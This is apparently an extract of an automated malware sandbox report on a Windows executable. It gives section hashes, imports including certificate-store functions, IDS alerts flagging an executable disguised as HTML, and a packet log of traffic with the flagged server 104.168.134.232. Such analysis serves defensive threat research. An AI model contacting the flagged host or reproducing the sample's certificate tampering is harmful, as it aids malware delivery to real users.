IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9cf8 | 0x9e00 | bae4521030709e187bdbe8a34d7bf731 | False | 0.6035650712025317 | data | 6.581464957368758 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xb000 | 0x5d58 | 0x5e00 | ec94ce6ebdbe57640638e0aa31d08896 | False | 0.4178025265957447 | Applesoft BASIC program data, first line number 1 | 4.843224204192078 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x11000 | 0x11cc | 0x800 | 04a548a5c04675d08166d3823a6bf61b | False | 0.16357421875 | data | 2.0120795802951505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x13000 | 0x1e0 | 0x200 | aa256780346be2e1ee49ac6d69d2faff | False | 0.52734375 | data | 4.703723272345726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x14000 | 0xddc | 0xe00 | 908329e10a1923a3c4938a10d44237d9 | False | 0.7776227678571429 | data | 6.495696626464028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x13060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
KERNEL32.dll | LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
CRYPT32.dll | CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T12:47:14.594623+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49748 | TCP
2024-12-22T12:47:16.941092+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49750 | TCP
2024-12-22T12:47:25.014789+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49756 | TCP
2024-12-22T12:47:27.353673+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49758 | TCP
2024-12-22T12:47:30.011230+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49760 | TCP
2024-12-22T12:47:32.707382+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49762 | TCP
2024-12-22T12:47:37.091079+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49763 | TCP
2024-12-22T12:47:40.347990+0100 | 2009897 | ET MALWARE Possible Windows executable sent when remote host claims to send html content | 1 | 104.168.134.232 | 443 | 192.168.2.4 | 49764 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.351429939 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.355195999 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.355278015 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.356806040 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.356929064 CET44349737104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:05.356996059 CET49737443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.328684092 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.328737974 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.328792095 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.329090118 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:12.329103947 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.670329094 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.670416117 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.673899889 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.673912048 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.674976110 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.717669964 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.720179081 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:13.763329983 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358784914 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358871937 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358892918 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358944893 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358969927 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.358982086 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359018087 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359021902 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359035015 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359065056 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.359086990 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413402081 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413495064 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413507938 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413541079 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413552999 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.413583040 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557511091 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557601929 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557602882 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557661057 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557670116 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.557749987 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594614029 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594697952 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594749928 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594750881 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594760895 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.594819069 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625859976 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625946045 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625972986 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.625982046 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.626054049 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.654911995 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.654988050 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655039072 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655039072 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655046940 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655081034 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655108929 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655222893 CET44349748104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.655853033 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.657349110 CET49748443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.686233044 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.686275959 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.686363935 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.688702106 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:14.688718081 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.027808905 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.029460907 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.029484034 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718158007 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718221903 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718266010 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718276978 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718296051 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718308926 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.718331099 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.772886992 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.772949934 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.772985935 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.773003101 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.773034096 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.773087978 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.915966034 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916018963 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916084051 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916095972 CET44349750104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916122913 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:16.916147947 CET49750443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378437042 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378462076 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378477097 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378499031 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.378519058 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407701969 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407767057 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407809973 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407818079 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407840967 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.407855034 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492613077 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492681026 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492731094 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492746115 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.492782116 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517399073 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517462969 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517599106 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517599106 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517606974 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.517656088 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540098906 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540173054 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540288925 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540288925 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540297985 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.540388107 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.552934885 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.552999973 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553026915 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553034067 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553061008 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.553086996 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565319061 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565376997 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565404892 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565412045 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565440893 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.565460920 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.676985025 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677057981 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677097082 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677108049 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677135944 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.677154064 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.678725004 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.678913116 CET44349758104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.678971052 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.679195881 CET49758443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.730647087 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.730707884 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.730921030 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.731005907 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:27.731021881 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.070816994 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.078130960 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.078213930 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.763750076 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.763818026 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.763861895 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764031887 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764031887 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764097929 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.764168978 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816184044 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816279888 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816278934 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816306114 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816335917 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.816365957 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968240023 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968303919 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968359947 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968413115 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968446970 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:29.968467951 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011360884 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011435032 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011590004 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011606932 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.011795998 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019705057 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019787073 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019807100 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.019927025 CET44349760104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.020013094 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.020032883 CET49760443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031104088 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:30.031146049 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.166320086 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.166321039 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.166383982 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.167551994 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.175909996 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.175970078 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.176027060 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.176094055 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.176130056 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.176251888 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.185688972 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.185731888 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.185902119 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.185902119 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.185966015 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.187552929 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.194379091 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.194421053 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.194569111 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.194569111 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.194601059 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.194653988 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.203425884 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.203474045 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.203547001 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.203547001 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.203610897 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.203659058 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.212889910 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.212934971 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.213109016 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.213109970 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.213172913 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.213224888 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.222347021 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.222402096 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.222551107 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.222552061 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.222616911 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.223541975 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.234827995 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.234894037 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.235043049 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.235043049 CET49762443192.168.2.4104.168.134.232
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.235107899 CET44349762104.168.134.232192.168.2.4
                                                                                                                                                                                                                                                Dec 22, 2024 12:47:33.235172033 CET49762443192.168.2.4104.168.134.232
